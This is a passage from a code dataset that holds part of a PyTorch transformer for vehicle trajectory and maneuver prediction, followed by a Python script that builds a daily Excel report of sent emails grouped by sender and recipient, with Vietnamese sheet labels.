torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy, time\nfrom torch.autograd import Variable\n\nfrom utils import outputActivation\n\nimport pdb\n\n\n# Customizations\n# - DONE Embeddings: linear transform d_feats -> d_model features\n# - DONE Generator\n# - DONE Batching\n\n# DONE: add social context\n# DONE : use maneuvers\n#\t\t\t- GeneratorLat and GeneratorLon DONE\n#\t\t\t- Embeddings with traj/grid/lat/lon features DONE\n\n\n# ---------- EMBEDDINGS ----------\n\nclass Embeddings(nn.Module):\n\tdef __init__(self, d_model, src_feats, src_ngrid=0, src_grid=(13,3), src_lon=0, src_lat=0, soc_emb_size=0):\n\t\tsuper(Embeddings, self).__init__()\n\t\t#self.lut = nn.Embedding(vocab, d_model)\n\t\tself.d_model = copy.copy(d_model)\n\n\t\tself.traj_emb = None\n\t\tself.grid_emb = None\n\t\tself.lat_emb = None\n\t\tself.lon_emb = None\n\t\tself.soc_emb = None\n\n\t\tself.soc_emb_size = soc_emb_size\n\n\t\t# Baiscally out of the 512 features for d_model encoding we split as:\n\t\t#\t256 features for ego traj inputs\n\t\t#\t256 features for social context (occupancy grid) inputs\n\t\t# Additionaly we may reserve 20 features (3*4+2*4) for maneuveurs used as inputs\n\n\t\t# Or just 512 features for taj_emb (eg at the output)\n\n\t\tif src_ngrid > 0: # handle 2D input features with conv net\n\t\t\td_model_grid = d_model//2\n\t\t\td_model -= d_model_grid\n\t\t\t# We start with [Batch, src_ngrid, 13, 3]\n\t\t\tself.conv1 = torch.nn.Conv2d(src_ngrid, 64, 3) # => [64, 11, 1]\n\t\t\tself.conv2 = torch.nn.Conv2d(64, 16, (3,1)) # => [16,\t9, 1]\n\t\t\tself.maxpool = torch.nn.MaxPool2d((2,1),padding = (1,0)) # => [16, 5, 1]\n\t\t\tself.leaky_relu = torch.nn.LeakyReLU(0.1)\n\t\t\tself.grid_emb = torch.nn.Linear(5, d_model_grid) # 5 from [16, 5, 1]\n\n\t\t\tif soc_emb_size > 0:\n\t\t\t\tself.soc_emb = torch.nn.Linear(soc_emb_size, d_model_grid) # projection\n\n\t\tif src_lon > 0:\n\t\t\td_model_lon = src_lon * 4\n\t\t\td_model -= d_model_lon\n\t\t\tself.lon_emb = torch.nn.Linear(src_lon, d_model_lon)\n\n\t\tif src_lat > 0:\n\t\t\td_model_lat = src_lat * 4\n\t\t\td_model -= d_model_lat\n\t\t\tself.lat_emb = torch.nn.Linear(src_lat, d_model_lat)\n\n\t\tself.traj_emb = torch.nn.Linear(src_feats, d_model)\n\n\tdef forward(self, x):\n\t\t# workaround to make nn.Sequential work with multiple inputs\n\t\t# cf https://discuss.pytorch.org/t/nn-sequential-layers-forward-with-multiple-inputs-error/35591/3\n\t\t#x, soc = x[0], x[1]\n\t\ttraj, grid, lon, lat = x\n\t\temb = self.traj_emb(traj) # * math.sqrt(self.d_model)\n\n\t\tif grid is not None:\n\t\t\tif len(grid.shape) == 3: # 1D input\n\t\t\t\tassert self.soc_emb is not None\n\t\t\t\tsoc_emb = self.soc_emb(grid) # * math.sqrt(self.d_model)\n\t\t\t\temb = torch.cat((emb, soc_emb), dim=-1)\n\t\t\telse: # 2D input\n\t\t\t\tassert self.grid_emb is not None\n\t\t\t\t## Apply convolutional social pooling: => [128, 16, 5, 1]\n\t\t\t\tgrid_enc = self.maxpool(self.leaky_relu(self.conv2(self.leaky_relu(self.conv1(grid)))))\n\t\t\t\tgrid_enc = torch.squeeze(grid_enc) # [128, 16, 5]\n\t\t\t\tgrid_emb = self.grid_emb(grid_enc)\n\t\t\t\temb = torch.cat((emb, grid_emb), dim=-1)\n\n\t\tif lon is not None:\n\t\t\tassert self.lon_emb is not None\n\t\t\tlon_emb = self.lon_emb(lon) # * math.sqrt(self.d_model)\n\t\t\temb = torch.cat((emb, lon_emb), dim=-1)\n\n\t\tif lat is not None:\n\t\t\tassert self.lat_emb is not None\n\t\t\tlat_emb = self.lat_emb(lat) # * math.sqrt(self.d_model)\n\t\t\temb = torch.cat((emb, lat_emb), dim=-1)\n\n\t\t#print(\"EMB:\", emb.shape)\n\t\treturn emb # * math.sqrt(self.d_model)\n\t\t#return self.lut(x) * math.sqrt(self.d_model)\n\n\nclass PositionalEncoding(nn.Module):\n\t\"Implement the PE function.\"\n\tdef __init__(self, d_model, dropout, max_len=5000):\n\t\tsuper(PositionalEncoding, self).__init__()\n\t\tself.dropout = nn.Dropout(p=dropout)\n\t\t\n\t\t# Compute the positional encodings once in log space.\n\t\tpe = torch.zeros(max_len, d_model)\n\t\tposition = torch.arange(0., max_len).unsqueeze(1)\n\t\tdiv_term = torch.exp(torch.arange(0., d_model, 2) *\n\t\t\t\t\t\t\t -(math.log(10000.0) / d_model))\n\t\tpe[:, 0::2] = torch.sin(position * div_term)\n\t\tpe[:, 1::2] = torch.cos(position * div_term)\n\t\tpe = pe.unsqueeze(0)\n\t\tself.register_buffer('pe', pe)\n\t\t\n\tdef forward(self, x):\n\t\tx = x + Variable(self.pe[:, :x.size(1)], \n\t\t\t\t\t\t requires_grad=False)\n\t\treturn self.dropout(x)\n\n\n# ---------- COMMON LAYERS for encoder/decoder ----------\n\ndef attention(query, key, value, mask=None, dropout=None):\n\t\"Compute 'Scaled Dot Product Attention'\"\n\td_k = query.size(-1)\n\tscores = torch.matmul(query, key.transpose(-2, -1)) \\\n\t\t\t / math.sqrt(d_k)\n\tif mask is not None:\n\t\tscores = scores.masked_fill(mask == 0, -1e9)\n\tp_attn = F.softmax(scores, dim = -1)\n\tif dropout is not None:\n\t\tp_attn = dropout(p_attn)\n\treturn torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n\tdef __init__(self, h, d_model, dropout=0.1):\n\t\t\"Take in model size and number of heads.\"\n\t\tsuper(MultiHeadedAttention, self).__init__()\n\t\tassert d_model % h == 0\n\t\t# We assume d_v always equals d_k\n\t\tself.d_k = d_model // h\n\t\tself.h = h\n\t\tself.linears = clones(nn.Linear(d_model, d_model), 4)\n\t\tself.attn = None\n\t\tself.dropout = nn.Dropout(p=dropout)\n\t\t\n\tdef forward(self, query, key, value, mask=None):\n\t\t\"Implements Figure 2\"\n\t\tif mask is not None:\n\t\t\t# Same mask applied to all h heads.\n\t\t\tmask = mask.unsqueeze(1)\n\t\tnbatches = query.size(0)\n\t\t\n\t\t# 1) Do all the linear projections in batch from d_model => h x d_k \n\t\tquery, key, value = \\\n\t\t\t[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n\t\t\t for l, x in zip(self.linears, (query, key, value))]\n\t\t\n\t\t# 2) Apply attention on all the projected vectors in batch. \n\t\tx, self.attn = attention(query, key, value, mask=mask, \n\t\t\t\t\t\t\t\t dropout=self.dropout)\n\t\t\n\t\t# 3) \"Concat\" using a view and apply a final linear. \n\t\tx = x.transpose(1, 2).contiguous() \\\n\t\t\t .view(nbatches, -1, self.h * self.d_k)\n\t\treturn self.linears[-1](x)\n\n\nclass LayerNorm(nn.Module):\n\t\"Construct a layernorm module (See citation for details).\"\n\tdef __init__(self, features, eps=1e-6):\n\t\tsuper(LayerNorm, self).__init__()\n\t\tself.a_2 = nn.Parameter(torch.ones(features))\n\t\tself.b_2 = nn.Parameter(torch.zeros(features))\n\t\tself.eps = eps\n\n\tdef forward(self, x):\n\t\tmean = x.mean(-1, keepdim=True)\n\t\tstd = x.std(-1, keepdim=True)\n\t\treturn self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n\t\"\"\"\n\tA residual connection followed by a layer norm.\n\tNote for code simplicity the norm is first as opposed to last.\n\t\"\"\"\n\tdef __init__(self, size, dropout):\n\t\tsuper(SublayerConnection, self).__init__()\n\t\tself.norm = LayerNorm(size)\n\t\tself.dropout = nn.Dropout(dropout)\n\n\tdef forward(self, x, sublayer):\n\t\t\"Apply residual connection to any sublayer with the same size.\"\n\t\t# XXX return x + self.dropout(sublayer(self.norm(x)))\n\t\t# XXX Normalize after residual cnx like in the paper\n\t\treturn self.norm(x + self.dropout(sublayer(x)))\n\n\nclass PositionwiseFeedForward(nn.Module):\n\t\"Implements FFN equation.\"\n\tdef __init__(self, d_model, d_ff, dropout=0.1):\n\t\tsuper(PositionwiseFeedForward, self).__init__()\n\t\tself.w_1 = nn.Linear(d_model, d_ff)\n\t\tself.w_2 = nn.Linear(d_ff, d_model)\n\t\tself.dropout = nn.Dropout(dropout)\n\n\tdef forward(self, x):\n\t\treturn self.w_2(self.dropout(F.relu(self.w_1(x))))\n\n\ndef clones(module, N):\n\t\"Produce N identical layers.\"\n\treturn nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\n# ---------- ENCODER ----------\n\nclass EncoderLayer(nn.Module):\n\t\"Encoder is made up of self-attn and feed forward (defined below)\"\n\tdef __init__(self, size, self_attn, feed_forward, dropout):\n\t\tsuper(EncoderLayer, self).__init__()\n\t\tself.self_attn = self_attn\n\t\tself.feed_forward = feed_forward\n\t\tself.sublayer = clones(SublayerConnection(size, dropout), 2)\n\t\tself.size = size\n\n\tdef forward(self, x, mask):\n\t\t\"Follow Figure 1 (left) for connections.\"\n\t\tx = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n\t\treturn self.sublayer[1](x, self.feed_forward)\n\n\nclass Encoder(nn.Module):\n\t\"Core encoder is a stack of N layers\"\n\tdef __init__(self, layer, N):\n\t\tsuper(Encoder, self).__init__()\n\t\tself.layers = clones(layer, N)\n\t\tself.norm = LayerNorm(layer.size)\n\t\t\n\tdef forward(self, x, mask):\n\t\t\"Pass the input (and mask) through each layer in turn.\"\n\t\tfor layer in self.layers:\n\t\t\tx = layer(x, mask)\n\t\treturn self.norm(x)\n\n\n# ---------- DECODER ----------\n\nclass DecoderLayer(nn.Module):\n\t\"Decoder is made of self-attn, src-attn, and feed forward (defined below)\"\n\tdef __init__(self, size, self_attn, src_attn, feed_forward, dropout):\n\t\tsuper(DecoderLayer, self).__init__()\n\t\tself.size = size\n\t\tself.self_attn = self_attn\n\t\tself.src_attn = src_attn\n\t\tself.feed_forward = feed_forward\n\t\tself.sublayer = clones(SublayerConnection(size, dropout), 3)\n \n\tdef forward(self, x, memory, src_mask, tgt_mask):\n\t\t\"Follow Figure 1 (right) for connections.\"\n\t\tm = memory\n\t\tx = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))\n\t\tx = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))\n\t\treturn self.sublayer[2](x, self.feed_forward)\n\n\nclass Decoder(nn.Module):\n\t\"Generic N layer decoder with masking.\"\n\tdef __init__(self, layer, N):\n\t\tsuper(Decoder, self).__init__()\n\t\tself.layers = clones(layer, N)\n\t\tself.norm = LayerNorm(layer.size)\n\t\t\n\tdef forward(self, x, memory, src_mask, tgt_mask):\n\t\tfor layer in self.layers:\n\t\t\tx = layer(x, memory, src_mask, tgt_mask)\n\t\treturn self.norm(x)\n\n\n# ---------- ENCODER/DECODER ----------\n\nclass EncoderDecoder(nn.Module):\n\t\"\"\"\n\tA standard Encoder-Decoder architecture. Base for this and many \n\tother models.\n\t\"\"\"\n\tdef __init__(self, encoder, decoder, src_embed, tgt_embed, generator=None, generator_lat=None, generator_lon=None):\n\t\tsuper(EncoderDecoder, self).__init__()\n\t\tself.encoder = encoder\n\t\tself.decoder = decoder\n\t\tself.src_embed = src_embed\n\t\tself.tgt_embed = tgt_embed\n\t\tself.generator = generator\n\t\tself.generator_lat = generator_lat\n\t\tself.generator_lon = generator_lon\n\t\t\n\tdef forward(self, src, tgt, src_mask, tgt_mask, src_grid=None, src_lon=None, src_lat=None):\n\t\t\"Take in and process masked src and target sequences.\"\n\t\treturn self.decode(self.encode(src, src_mask, src_grid, src_lon, src_lat), src_mask,\n\t\t\t\t\t\t\ttgt, tgt_mask)\n\t\n\tdef encode(self, src, src_mask, src_grid=None, src_lon=None, src_lat=None):\n\t\treturn self.encoder(self.src_embed((src, src_grid, src_lon, src_lat)), src_mask)\n\t\n\tdef decode(self, memory, src_mask, tgt, tgt_mask):\n\t\treturn self.decoder(self.tgt_embed((tgt, None, None, None)), memory, src_mask, tgt_mask)\n\n\t#def prepare_infer(self, Ty, batch_size):\n\t#\tself.ys_masks = []\n\t#\tself.Ty = Ty\n\t#\tfor i in range(Ty):\n\t#\t\tys_mask = np.ones( (i+1, i+1), dtype='uint8')\n\t#\t\tys_mask = np.tril(ys_mask, 0)\n\t#\t\tys_mask = np.repeat(ys_mask[np.newaxis, :, :], batch_size, axis=0)\n\t#\t\tys_mask = torch.from_numpy(ys_mask)\n\t#\t\tif torch.cuda.is_available():\n\t#\t\t\tys_mask = ys_mask.cuda()\n\t#\t\tself.ys_masks.append(ys_mask)\n\n\tdef infer(self, model, src, src_mask, Ty, src_grid=None, src_lon=None, src_lat=None):\n\t\tm, Tx, nx = src.shape\n\t\tmemory = model.encode(src, src_mask, src_grid, src_lon, src_lat) # [Batch 128, Tx 16, d_model 512]\n\t\tys = src[:, -1, 0:2].unsqueeze(1) # [Batch 128, ys.size(1) 1, X/Y 2]\n\t\n\t\tfor i in range(Ty):\n\t\t\tys_mask = np.ones( (ys.size(1), ys.size(1)), dtype='uint8')\n\t\t\tys_mask = np.tril(ys_mask, 0)\n\t\t\tys_mask = np.repeat(ys_mask[np.newaxis, :, :], m, axis=0)\n\t\t\tys_mask = torch.from_numpy(ys_mask)\n\t\t\tif torch.cuda.is_available():\n\t\t\t\tys_mask = ys_mask.cuda()\n\n\t\t\t#out = model.decode(memory, src_mask, ys, self.ys_masks[i]) # [Batch 128, ys.size(1), d_model 512]\n\t\t\t# Last batch is usually not of size batch_size ...\n\t\t\tout = model.decode(memory, src_mask, ys, ys_mask) # [Batch , ys.size(1), d_model 512]\n\t\t\tfut_pred = model.generator(out) # [ys.size(1), Batch 128, gaussian_params 5]\n\t\t\tfut_pred = fut_pred.permute(1, 0, 2) # [Batch 128, ys.size(1), gaussian_params 5]\n\t\t\tnext_y = fut_pred[:, -1, 0:2].unsqueeze(1) # [Batch 128, 1, muX/muY 2]\n\t\t\tys = torch.cat( (ys, next_y), dim=1) # [Batch 128, ys.size(1)+1, 2]\n\t\n\t\tfut_pred = fut_pred.permute(1, 0, 2) # [Ty 25, Batch 128, 5]\n\t\treturn fut_pred\n\n\n# ---------- GENERATOR: for final output ----------\n\nclass Generator(nn.Module):\n\t\"Define standard linear + softmax generation step.\"\n\tdef __init__(self, d_model, tgt_params):\n\t\tsuper(Generator, self).__init__()\n\t\tself.proj = nn.Linear(d_model, tgt_params)\n\n\tdef forward(self, x):\n\t\t# params: [batch 128, Ty 25, bivariate gaussian params 5] \n\t\tfut_pred = self.proj(x)\n\t\t# fut_pred: [Ty 25, batch 128, 5] via permute\n\t\tfut_pred = fut_pred.permute(1, 0, 2)\n\t\tfut_pred = outputActivation(fut_pred)\n\t\t# fut_pred: [Ty 25, batch 128, bivariate gaussian params 5] via outputActivation which enforces pred constraints\n\t\treturn fut_pred\n\t\t#return F.log_softmax(self.proj(x), dim=-1)\n\nclass GeneratorLat(nn.Module):\n\t\"Define standard linear + softmax generation step.\"\n\tdef __init__(self, d_model, tgt_lat_classes):\n\t\tsuper(GeneratorLat, self).__init__()\n\t\t# 3 classes: right, left, none\n\t\tself.proj = nn.Linear(d_model, tgt_lat_classes)\n\n\tdef forward(self, x):\n\t\tlat_pred = F.softmax(self.proj(x), dim=-1) # [Batch 128, Ty, 3]\n\t\tlat_pred = lat_pred[:, -1, :]\n\t\tlat_pred = torch.squeeze(lat_pred)\n\t\treturn lat_pred # [Batch 128, 3]\n\nclass GeneratorLon(nn.Module):\n\t\"Define standard linear + softmax generation step.\"\n\tdef __init__(self, d_model, tgt_lon_classes):\n\t\tsuper(GeneratorLon, self).__init__()\n\t\t# 2 classes: braking or not\n\t\tself.proj = nn.Linear(d_model, 2, tgt_lon_classes)\n\n\tdef forward(self, x):\n\t\tlon_pred = F.softmax(self.proj(x), dim=-1)\n\t\tlon_pred = lon_pred[:, -1, :]\n\t\tlon_pred = torch.squeeze(lon_pred)\n\t\treturn lon_pred # [Batch 128, 2]\n\n\n\n# ---------- FULL MODEL ----------\n\n# This model does not use lon/lat features as inputs\n# But predicts lon/lat maneuvers\n# DEPRECATED\ndef make_model_cls(src_feats, tgt_feats, tgt_lon_classes=2, tgt_lat_classes=3, \n\t\t\t\t\tN=6, d_model=512, d_ff=2048, h=8, dropout=0.1,\n\t\t\t\t\tsrc_ngrid=0, src_grid=(13,3), src_soc_emb_size=0):\n\t\"Helper: Construct a model from hyperparameters.\"\n\tc = copy.deepcopy\n\tattn = MultiHeadedAttention(h, d_model)\n\tff = PositionwiseFeedForward(d_model, d_ff, dropout)\n\tposition = PositionalEncoding(d_model, dropout)\n\n\tmodel = EncoderDecoder(\n\t\tEncoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),\n\t\tDecoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), N),\n\t\tnn.Sequential(Embeddings(d_model, src_feats, src_ngrid, src_grid, src_soc_emb_size), c(position)),\n\t\tnn.Sequential(Embeddings(d_model, tgt_feats), c(position)),\n\t\tgenerator_lat = GeneratorLat(d_model, tgt_lon_classes),\n\t\tgenerator_lon = GeneratorLon(d_model, tgt_lat_classes))\n\t\n\t# This was important from their code. \n\t# Initialize parameters with Glorot / fan_avg.\n\tfor p in model.parameters():\n\t\tif p.dim() > 1:\n\t\t\tnn.init.xavier_uniform(p)\n\treturn model\n\n\n# This model uses lon/lat features as inputs\n# And predicts traj\n#def make_model(src_feats, tgt_feats, tgt_params=5, N=6, d_model=512, d_ff=2048, h=8, dropout=0.1,\n#def make_model(src_feats, tgt_feats, tgt_params=5, N=1, d_model=256, d_ff=1024, h=1, dropout=0.1,\ndef make_model(src_feats, tgt_feats, tgt_params=5, N=1, d_model=256, d_ff=256, h=4, dropout=0.1,\n\t\t\t src_ngrid=0, src_grid=(13,3), # for 2D image like input features\n\t\t\t src_soc_emb_size = 0,\n\t\t\t src_lon=0, src_lat=0): # additional input features (TODO: list for genericity)\n\t\"Helper: Construct a model from hyperparameters.\"\n\tc = copy.deepcopy\n\tattn = MultiHeadedAttention(h, d_model)\n\tff = PositionwiseFeedForward(d_model, d_ff, dropout)\n\tposition = PositionalEncoding(d_model, dropout)\n\n\tmodel = EncoderDecoder(\n\t\tEncoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),\n\t\tDecoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), N),\n\t\tnn.Sequential(Embeddings(d_model, src_feats, src_ngrid, src_grid, src_lon, src_lat, src_soc_emb_size), c(position)),\n\t\tnn.Sequential(Embeddings(d_model, tgt_feats), c(position)),\n\t\tgenerator = Generator(d_model, tgt_params))\n\t\n\t# This was important from their code. \n\t# Initialize parameters with Glorot / fan_avg.\n\tfor p in model.parameters():\n\t\tif p.dim() > 1:\n\t\t\tnn.init.xavier_uniform(p)\n\treturn model\n\n\n# ---------- BATCH utility ----------\n\nclass Batch:\n\t\"Object for holding a batch of data with mask during training.\"\n\tdef __init__(self):\n\t\tself.src = None\n\t\tself.src_grid = None\n\t\tself.src_mask = None\n\t\tself.src_lon = None\n\t\tself.src_lat = None\n\t\tself.trg = None\n\t\tself.trg_mask = None\n\t\tself.trg_y = None\n\n\tdef transfo(self, source, target=None, source_grid=None, source_lon=None, source_lat=None):\n\t\t# We want [Batch, Tx, Nx]\n\t\tsrc = copy.copy(source)\n\t\tsrc = src.permute(1, 0, 2)\n\t\tself.src = src\n\n\t\tm, Tx, _ = src.shape\n\n\t\t# [Batch, Tx, 13, 3] for grid or [Batch, Tx, 80] for grid_soc\n\t\tsrc_grid = copy.copy(source_grid)\n\t\tself.src_grid = src_grid\n\n\t\t# encoder has full visibility on all inputs\n\t\tsrc_mask = np.ones((1, Tx), dtype='uint8')\n\t\t#src_mask[:,0] = 0\n\t\tsrc_mask = np.repeat(src_mask[np.newaxis, :, :], m, axis=0)\n\t\tself.src_mask = torch.from_numpy(src_mask)\n\n\t\tif source_lon is not None:\n\t\t\tsrc_lon = copy.copy(source_lon)\n\t\t\tsrc_lon = torch.unsqueeze(src_lon, dim=1)\n\t\t\tsrc_lon = torch.repeat_interleave(src_lon, Tx, dim=1)\n\t\t\tself.src_lon = src_lon\n\t\telse:\n\t\t\tself.src_lon = None\n\n\t\tif source_lat is not None:\n\t\t\tsrc_lat = copy.copy(source_lat)\n\t\t\tsrc_lat = torch.unsqueeze(src_lat, dim=1)\n\t\t\tsrc_lat = torch.repeat_interleave(src_lat, Tx, dim=1)\n\t\t\tself.src_lat = src_lat\n\t\telse:\n\t\t\tself.src_lat = None\n\n\t\tself.ntokens = torch.from_numpy(np.array([m*Tx]))\n\n\t\t# We want [Batch, Ty, Ny]\n\t\tif target is not None:\n\t\t\ttrg = copy.copy(target)\n\t\t\ttrg = trg.permute(1, 0, 2)\n\n\t\t\t# Create a fake Transformer \"start symbol/step\" by repeating \"end of input\" in beginning of trg\n\t\t\t# The \"start symbol\" is pretty common for NMT taks; do something similar here\n\t\t\ttrg = torch.cat((src[:,-1,:].unsqueeze(1), trg), dim=1)\n\n\t\t\tmy, Ty, ny = trg.shape\n\t\t\tassert m == my, \"src and trg batch sizes do not match\"\n\n\t\t\t# ensure sequentiality between input and output of decoder\n\t\t\t# y(n) depends on y(1)...y(n-1)\n\t\t\tself.trg = trg[:, :-1, :]\t# input of DECODER\n\t\t\tself.trg_y = trg[:, 1:, :] # expected output of DECODER\n\t\t\t# otherwise the decoder just \"learns\" to copy the input ...\n\t\t\t# with quickly a loss of 0 during training .....\n\t\t\t\n\t\t\t\n\t\t\t# decoder at step n, has visibility on y(1)..y(n-1)\n\t\t\ttrg_mask = np.ones((Ty-1,Ty-1), dtype='uint8')\n\t\t\ttrg_mask = np.tril(trg_mask, 0)\n\t\t\ttrg_mask = np.repeat(trg_mask[np.newaxis, :, :], m, axis=0)\n\t\t\tself.trg_mask = torch.from_numpy(trg_mask)\n\n\t\t\tif torch.cuda.is_available():\n\t\t\t\tself.trg = self.trg.cuda()\n\t\t\t\tself.trg_y = self.trg_y.cuda()\n\t\t\t\tself.trg_mask = self.trg_mask.cuda()\n\t\telse:\n\t\t\tself.trg = None\n\t\t\tself.trg_y = None\n\t\t\tself.trg_mask = None\n\n\t\t#print(\"SRC:\", self.src.shape)\n\t\t#if self.src_grid is not None:\n\t\t#\tprint(\"SRC_GRID:\", self.src_grid.shape)\n\t\t#print(\"TRG:\", self.trg.shape)\n\t\t#print(\"TRG_Y:\", self.trg_y.shape)\n\n\t\tif torch.cuda.is_available():\n\t\t\tself.src = self.src.cuda()\n\t\t\tself.src_mask = self.src_mask.cuda()\n\t\t\tif self.src_lon is not None:\n\t\t\t\tself.src_lon = self.src_lon.cuda()\n\t\t\tif self.src_lat is not None:\n\t\t\t\tself.src_lat = self.src_lat.cuda()\n\t\t\tif self.src_grid is not None:\n\t\t\t\tself.src_grid = self.src_grid.cuda()\n","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":19055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"92280491","text":"import setttings \nimport xlsxwriter\nimport datetime\nimport os \nimport pandas as pd\nimport logging\n\n\nfrom pathlib import Path\nfrom time import sleep\n\nfrom csvhandle import get_outbox_email_list_per_day,get_outbox_relation_per_day\nfrom csvhandle import get_total_mail_of_a_address,get_total_mail_of_b_address\nfrom displayutils import printProgressBar\n\n\n##logging config\nlogging.basicConfig(filename='excel_report.log',level=logging.INFO)\nprint(\"inited logger\")\n####################initialization\ntry:\n email_count = 0\n file_name = setttings.EXCEL_FILE_LOC+\"Báo cáo NGK ngày \"+setttings.CURRENT_DAY+setttings.EXCEL_EXTENSION\n date = str(datetime.datetime.now().day) + \"-\" + str(datetime.datetime.now().month) + \"-\" + str(datetime.datetime.now().year) \n eml_csv = ''\n outbox_rela_as_series = pd.Series()\n\n try:\n eml_csv = pd.read_csv(os.path.join(setttings.CSV_FILE_LOC,'eml_data'+setttings.CURRENT_DAY+setttings.CSV_EXTENSION),sep=\",\")\n eml_csv = eml_csv.drop_duplicates(subset=['eml_file_name','a_address','b_address']) \n #extension = '.txt'\n outbox_rela_as_series = get_outbox_relation_per_day(eml_csv,date)\n except FileNotFoundError as e:\n print(\"\\n\\nChưa có file .csv của ngày hôm nay\\n\\n\") \n exit(1) \n\n\n\n #create workbook & wo3rksheet\n workbook = xlsxwriter.Workbook(file_name)\n main_worksheet = workbook.add_worksheet(\"Tổng quan\")\n a_address_worksheet = workbook.add_worksheet(\"Đối tượng gửi\")\n b_address_worksheet = workbook.add_worksheet(\"Đối tượng nhận\")\n #formatting stuffs\n bold = workbook.add_format({'bold':1})\n money_format = workbook.add_format({'num_format':'$#,##0'})\n date_format = workbook.add_format({'num_format':'dd mm yyyy'})\n\n #create format in merged range \n merge_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter',\n 'fg_color' : '#a0d0db'\n })\n from_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#dfda41'\n })\n to_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#00ced8'\n })\n number_of_mails_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#e68484'\n })\n location_format = workbook.add_format({\n 'bold' : 1,\n 'border' : 1,\n 'align' : 'center',\n 'valign' : 'vcenter', \n 'fg_color' : '#a8d8ba'\n })\n\n #header\n main_worksheet.write('A1','Địa chỉ gửi',from_format)\n main_worksheet.write('B1','Địa chỉ nhận',to_format)\n main_worksheet.write('C1','Số lượng thư',number_of_mails_format)\n main_worksheet.write('D1','Vị trí lưu trữ trên máy',location_format)\n main_worksheet.freeze_panes(1,0)\n row = 1\n col = 0\n\n #adjust columns width\n main_worksheet.set_column('A1:B1',30)\n main_worksheet.set_column('C1:C1',15)\n main_worksheet.set_column('D1:D1',180)\n main_worksheet.set_row(0,40)\n\n #print(outbox_rela_as_series)\n\n #initProgressBar\n printProgressBar(0,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n for i in range(0,len(outbox_rela_as_series)):\n for each_b_addr in outbox_rela_as_series[i]:\n start_pos = row\n \n main_worksheet.write(row,col,outbox_rela_as_series.index[i],from_format)\n col += 1\n main_worksheet.write(row,col,each_b_addr,to_format)\n col += 1\n main_worksheet.write(row,col,len(get_outbox_email_list_per_day(eml_csv,date,outbox_rela_as_series.index[i],each_b_addr)),number_of_mails_format)\n col += 1\n for each_mail in get_outbox_email_list_per_day(eml_csv,date,outbox_rela_as_series.index[i],each_b_addr):\n main_worksheet.write_url(row,col,each_mail)\n row += 1\n stop_pos = row-1\n col = 0\n row += 1\n main_worksheet.merge_range(start_pos,0,stop_pos,0,outbox_rela_as_series.index[i],from_format)\n main_worksheet.merge_range(start_pos,1,stop_pos,1,each_b_addr,to_format)\n main_worksheet.merge_range(start_pos,2,stop_pos,2,\n len(get_outbox_email_list_per_day(eml_csv,date,outbox_rela_as_series.index[i],\n each_b_addr)),number_of_mails_format)\n# main_worksheet.merge_range(start_pos)\n row += 1\n col = 0\n printProgressBar(i+1,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n row += 1\n col = 0\n\n ###########################\n ###########write sheet for a_address\n email_series_for_a_addr = get_total_mail_of_a_address(eml_csv,date)\n #print(email_series_for_a_addr)\n row = 1\n col = 0\n printProgressBar(0,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n for i in range(0,len(email_series_for_a_addr)):\n #remove duplicates in list \n email_series_for_a_addr[i] = list(set(email_series_for_a_addr[i]))\n a_address_worksheet.write(row,col,email_series_for_a_addr.index[i],from_format)\n col += 1\n a_address_worksheet.write(row,col,len(email_series_for_a_addr[i]),number_of_mails_format)\n col += 1\n #row += 1\n start_pos = row \n for each_mail in email_series_for_a_addr[i]: \n a_address_worksheet.write_url(row,col,each_mail)\n row += 1\n stop_pos = row-1 \n col = 0\n #row += 1\n a_address_worksheet.merge_range(start_pos,0,stop_pos,0,email_series_for_a_addr.index[i],from_format)\n a_address_worksheet.merge_range(start_pos,1,stop_pos,1,len(email_series_for_a_addr[i]),number_of_mails_format)\n #reset\n col = 0\n printProgressBar(i+1,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n\n a_address_worksheet.set_column('A1:B1',30)\n a_address_worksheet.set_column('C1:C1',180)\n a_address_worksheet.set_row(0,40)\n\n a_address_worksheet.write('A1','Địa chỉ gửi',from_format)\n a_address_worksheet.write('B1','Số lượng thư',number_of_mails_format)\n a_address_worksheet.write('C1','Vị trí lưu trữ trên máy',location_format)\n\n\n\n ###########################\n ###########write sheet for b_address\n email_series_for_b_addr = get_total_mail_of_b_address(eml_csv,date)\n row = 1\n col = 0\n #printProgressBar(0,len(outbox_rela_as_series),prefix=\"Tiến độ:\",length=50)\n for i in range(0,len(email_series_for_a_addr)):\n b_address_worksheet.write(row,col,email_series_for_b_addr.index[i],to_format)\n col += 1\n b_address_worksheet.write(row,col,len(email_series_for_b_addr[i]),number_of_mails_format)\n col += 1\n #row += 1\n start_pos = row \n for each_mail in email_series_for_b_addr[i]: \n b_address_worksheet.write_url(row,col,each_mail)\n row += 1\n stop_pos = row-1 \n col = 0\n #row += 1\n b_address_worksheet.merge_range(start_pos,0,stop_pos,0,email_series_for_b_addr.index[i],to_format)\n 